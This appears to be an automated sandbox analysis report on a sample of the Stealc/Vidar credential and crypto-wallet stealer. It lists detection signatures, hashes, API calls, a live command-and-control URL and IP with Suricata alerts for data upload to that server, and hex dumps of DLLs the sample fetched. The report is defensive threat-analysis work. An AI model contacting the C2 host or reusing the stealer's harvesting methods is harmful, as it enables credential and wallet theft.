Windows Analysis Report
fXg8zgxVTF.exe

Overview

General Information

Sample name: fXg8zgxVTF.exe
renamed because original name is a hash value
Original sample name: c7ca98803a76b62a6a379a0b684b162a.exe
Analysis ID: 1541134
MD5: c7ca98803a76b62a6a379a0b684b162a
SHA1: 00de8f4666fe890f9fd3bf2d405cae32f3c2cc78
SHA256: 7fff867271d6f0f7c301e83dad5875e2194dbf2389ac33130b7711db7e6904bd
Tags: 32exe
Infos:

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Found malware configuration
Source: fXg8zgxVTF.exe.3796.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "95.182.96.50/2aced82320799c96.php", "Botnet": "mainteam"}
Multi AV Scanner detection for submitted file
Source: fXg8zgxVTF.exe ReversingLabs: Detection: 34%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Uses 32bit PE files
Source: fXg8zgxVTF.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: fXg8zgxVTF.exe, 00000000.00000002.2396257880.000000006CB2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: fXg8zgxVTF.exe, 00000000.00000002.2396479769.000000006CCEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: fXg8zgxVTF.exe, 00000000.00000002.2396479769.000000006CCEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: fXg8zgxVTF.exe, 00000000.00000002.2396257880.000000006CB2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\wrk\umfen\Release\UndeleteMyFilesPro.pdb source: fXg8zgxVTF.exe
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0041C243 __EH_prolog3_GS,GetFullPathNameW,_DebugHeapAllocator,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,_DebugHeapAllocator, 0_2_0041C243
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00452350 lstrcpyW,RegOpenKeyW,RegEnumKeyW,RegCloseKey,lstrcpyW,RegCloseKey,lstrcatW,lstrcatW,RegOpenKeyW,RegEnumKeyW,RegCloseKey,lstrcatW,lstrcatW,lstrcatW,lstrcatW,RegCloseKey,lstrcatW,lstrcatW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00452350
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0043E4B0 lstrlenW,lstrcpyW,FindFirstFileW,FindNextFileW,lstrcpyW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindClose, 0_2_0043E4B0
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00452640 RegOpenKeyW,RegQueryValueExW,RegCloseKey,RegCloseKey,lstrcpyW,lstrlenW,lstrcpyW,FindFirstFileW,FindNextFileW,lstrcmpW,lstrcpyW,lstrcatW,lstrcatW,FindFirstFileW,FindNextFileW,FindClose,FindClose, 0_2_00452640
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00452910 lstrcpyW,RegOpenKeyW,RegEnumKeyW,RegCloseKey,lstrcatW,lstrcatW,lstrcatW,RegCloseKey,RegOpenKeyW,RegEnumKeyW,RegCloseKey,RegCloseKey,lstrcatW,lstrcatW,RegOpenKeyW,RegQueryValueExW,RegCloseKey,DoEnvironmentSubstW,lstrlenW,lstrcatW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00452910
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00468BA0 _DebugHeapAllocator,FindFirstFileW,FindNextFileW,FindClose,GetLastError, 0_2_00468BA0
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00468D60 _DebugHeapAllocator,FindFirstFileW,FindNextFileW,FindClose,GetLastError, 0_2_00468D60
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0043EEB0 FindFirstFileW,FindClose, 0_2_0043EEB0
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00468FC0 _DebugHeapAllocator,FindFirstFileW,_DebugHeapAllocator,_DebugHeapAllocator,FindNextFileW,FindClose,GetLastError, 0_2_00468FC0
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49714 -> 95.182.96.50:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:49714 -> 95.182.96.50:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 95.182.96.50:80 -> 192.168.2.6:49714
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:49714 -> 95.182.96.50:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.182.96.50:80 -> 192.168.2.6:49714
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:49714 -> 95.182.96.50:80
Source: Network traffic Suricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.6:49714 -> 95.182.96.50:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 95.182.96.50/2aced82320799c96.php
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 11:54:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 11:54:19 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 11:54:20 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 11:54:21 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 11:54:22 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 